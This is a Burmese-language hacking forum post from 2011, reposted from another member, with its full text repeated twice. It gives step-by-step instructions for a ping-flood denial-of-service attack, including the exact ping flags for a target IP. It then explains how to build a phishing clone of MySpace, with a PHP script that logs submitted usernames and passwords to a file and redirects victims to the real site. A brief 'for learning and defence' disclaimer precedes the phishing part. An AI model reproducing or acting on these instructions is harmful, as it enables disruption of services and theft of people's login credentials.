Easy Dos Attack and Phishing ( Web Page အတုလုပ္ျခင္း )
- Posted by ေျမြျဖဴ
on November 21, 2011 at 11:45am in Myanmar
Hackers Group
- Back to Myanmar Hackers Group Discussions
Dos Attack ဆိုတာ Denial of Service
Attack ကိုဆိုလိုျခင္းျဖစ္ပါတယ္
ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျဖင့္သူ၏လုပ္ငန္းမ်ားဆက္လက္မလုပ္
ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျခင္းတို႕ကိုဆိုလိုပါတယ္…
- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္
- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္မ်ားကေတာ့
၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္
၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address
- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္
၁. CMD ကိုဖြင့္ပါ
၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။
- စတင္တိုက္ခိုက္ျခင္း
၁. CMD ကိုဖြင့္ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။ (Site-IP ေနရာတြင္တိုက္ခိုက္
လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)
Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address
ကိုရိုက္ထည္႕ရပါမည္။
-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္သည္။ အႀကိမ္အေရအတြက္
ကိုေျပာင္းလဲႏိုင္ပါတယ္
-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္ေလာက္ၾကာရင္ေနာက္တစ္ခါထပ္တိုက္ခိုက္
မွာလည္းကိုေျပာျခင္းပါတယ္
သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခိုက္ႏိုင္မွာမဟုတ္ပါဘူး။
- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္ ။
အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။ တစ္စုံတစ္ဦးကိုနစ္နာလိုေသာရည္ရြယ္ခ်က္မရိွ
ပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္အတြက္ ႏွင့္ ကာကြယ္တတ္ရန္အတြက္သာျဖစ္ပါသည္။
Phishing ဆိုတာဘာလည္း ?
Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး
အျပည္႕အစုံဖတ္ရန္
Web site အတုဆိုတာကိုနားမလည္ဘူး
Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထားတာဘဲျဖစ္ပါတယ္။
ဘာလို႕ဖန္တီးတာလည္း ?
ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…
အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password ေတြပါသြားၿပီေပါ့
ဘယ္လိုဖန္တီးမွာလည္း ?
ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ
MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http://myspace.com ကိုသြားပါ
Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါ
အခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting တစ္ခုခုမွာတင္လိုက္ပါ
အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္
Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ
Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္ websiteကိုလမ္းေၾကာင္းေျပာင္းသြားဖို႕အတြက္ပါ
Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ
Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ
Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ
www.tizag.com, www.w3schools.com, မွာသြားေရာက္ေလ့လာႏိုင္ပါတယ္
header (’Location: http://myspace.com ‘);
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါ
ေနာက္ upload လုပ္ပါ
Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္။ ဒီေတာ့ index.html ကို notepad နဲ႕ဖြင့္ပါ။
action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက user name နဲ႕ password
ေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္တာပါ။ ဒီမွာေတာ့ E-mail ဆိုတဲ့ နာမည္ေလးနဲ႕ဘဲ
index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။
action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿပီး။ redirect.php ကိုအစားထိုးပါ။
အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿပီ……..။
မွတ္ခ်က္ /
ျမန္မာဆုိင္ဘာဖိုရမ္မွ Special Member တဦးျဖစ္သူ ကုိသီဟ (thiha1myat ) ၏ ပို႕စ္အား ကူးယူေဖၚျပျခင္းျဖစ္ပါသည္
ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကိုပိတ္ပင္ျခင္းတစ္နည္းအားျဖင့္သူ၏လုပ္ငန္းမ်ားဆက္လက္မလုပ္
ေဆာင္ႏိုင္ေအာင္ရပ္ဆိုင္းပစ္ျခင္းတို႕ကိုဆိုလိုပါတယ္…
- End-user systems, servers, routers နဲ႕ Website စတာေတြကိုတိုက္ခိုက္ႏိုင္ပါတယ္
- တိုက္ခိုက္ဖို႕အတြက္လိုအပ္ခ်က္မ်ားကေတာ့
၁. Command Prompt (CMD or DOS) windows system မွာပါလာၿပီးသားျဖစ္ပါတယ္
၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address
- Website ၏ IP address ကိုဘယ္လိုရႏိုင္မလည္းဆိုရင္
၁. CMD ကိုဖြင့္ပါ
၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။
- စတင္တိုက္ခိုက္ျခင္း
၁. CMD ကိုဖြင့္ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။ (Site-IP ေနရာတြင္တိုက္ခိုက္
လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)
Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address
ကိုရိုက္ထည္႕ရပါမည္။
-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟုေျပာျခင္းျဖစ္သည္။ အႀကိမ္အေရအတြက္
ကိုေျပာင္းလဲႏိုင္ပါတယ္
-w 0.00001 = တစ္ႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ဘယ္ေလာက္ၾကာရင္ေနာက္တစ္ခါထပ္တိုက္ခိုက္
မွာလည္းကိုေျပာျခင္းပါတယ္
သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w ေတြကိုျဖဳတ္ၿပီးသုံးရင္တိုက္ခိုက္ႏိုင္မွာမဟုတ္ပါဘူး။
- အခုလိုတိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္ ။
အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။ တစ္စုံတစ္ဦးကိုနစ္နာလိုေသာရည္ရြယ္ခ်က္မရိွ
ပါ။ နည္းပညာကိုပိုစိတ္၀င္စားလာေစရန္အတြက္ ႏွင့္ ကာကြယ္တတ္ရန္အတြက္သာျဖစ္ပါသည္။
Phishing ဆိုတာဘာလည္း ?
Web site အတုေတြကိုဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္းမမွားပါဘူး
အျပည္႕အစုံဖတ္ရန္
Web site အတုဆိုတာကိုနားမလည္ဘူး
Web site အတုဆိုတာနာမည္ႀကီးတဲ့ website ေတြကိုသူ႕ပုံစံအတိုင္းဖန္တီးထားတာဘဲျဖစ္ပါတယ္။
ဘာလို႕ဖန္တီးတာလည္း ?
ဥပမာေျပာရရင္ gmail ပုံစံ site တစ္ခုဖန္တီးလိုက္မယ္ဆိုပါစို႕…
အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password ေတြပါသြားၿပီေပါ့
ဘယ္လိုဖန္တီးမွာလည္း ?
ပထမဆုံး website အတုဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ
MySpace site ကိုဖန္တီးခ်င္တယ္ဆိုပါဆို႕ http://myspace.com ကိုသြားပါ
Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါ
အခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္…အဲဒါေတြကို web hosting တစ္ခုခုမွာတင္လိုက္ပါ
အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္
Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ
Php scriptတစ္ခုတည္ေဆာက္ပါမယ္။ ဘာလို႕လည္းဆိုရင္သင့္ webpage အတြက္ log fileတစ္ခုဖန္တီးခ်င္လို႕ရယ္၊ ေနာက္ၿပီး တကယ့္ websiteကိုလမ္းေၾကာင္းေျပာင္းသြားဖို႕အတြက္ပါ
Notepad ကိုဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ
Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ
Php script နဲ႕ပတ္သက္လို႕ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကိုသြားပါ
www.tizag.com, www.w3schools.com, မွာသြားေရာက္ေလ့လာႏိုင္ပါတယ္
header (’Location: http://myspace.com ‘);
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါ
ေနာက္ upload လုပ္ပါ
Index.html မွာျပင္စရာေလးေတြက်န္ေနေသးပါတယ္။ ဒီေတာ့ index.html ကို notepad နဲ႕ဖြင့္ပါ။
action= ကိုရွာပါ။ action နဲ႕ပတ္သက္တာေတြကအမ်ားႀကီးပါ အဓိကလိုခ်င္တာက user name နဲ႕ password
ေတြကိုဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္တာပါ။ ဒီမွာေတာ့ E-mail ဆိုတဲ့ နာမည္ေလးနဲ႕ဘဲ
index file ထဲမွာထပ္ရွာလိုက္ပါအုန္း။
action ထဲမွာပါ၀င္တဲ့စာသားေတြကိုဖ်က္ၿပီး။ redirect.php ကိုအစားထိုးပါ။
အခုဆိုရင္ေတာ့သင္ဟာ webpage အတုတစ္ခုကိုတည္ေဆာက္ၿပီးသြားပါၿပီ……..။
မွတ္ခ်က္ /
ျမန္မာဆုိင္ဘာဖိုရမ္မွ Special Member တဦးျဖစ္သူ ကုိသီဟ (thiha1myat ) ၏ ပို႕စ္အား ကူးယူေဖၚျပျခင္းျဖစ္ပါသည္
0 comments:
Post a Comment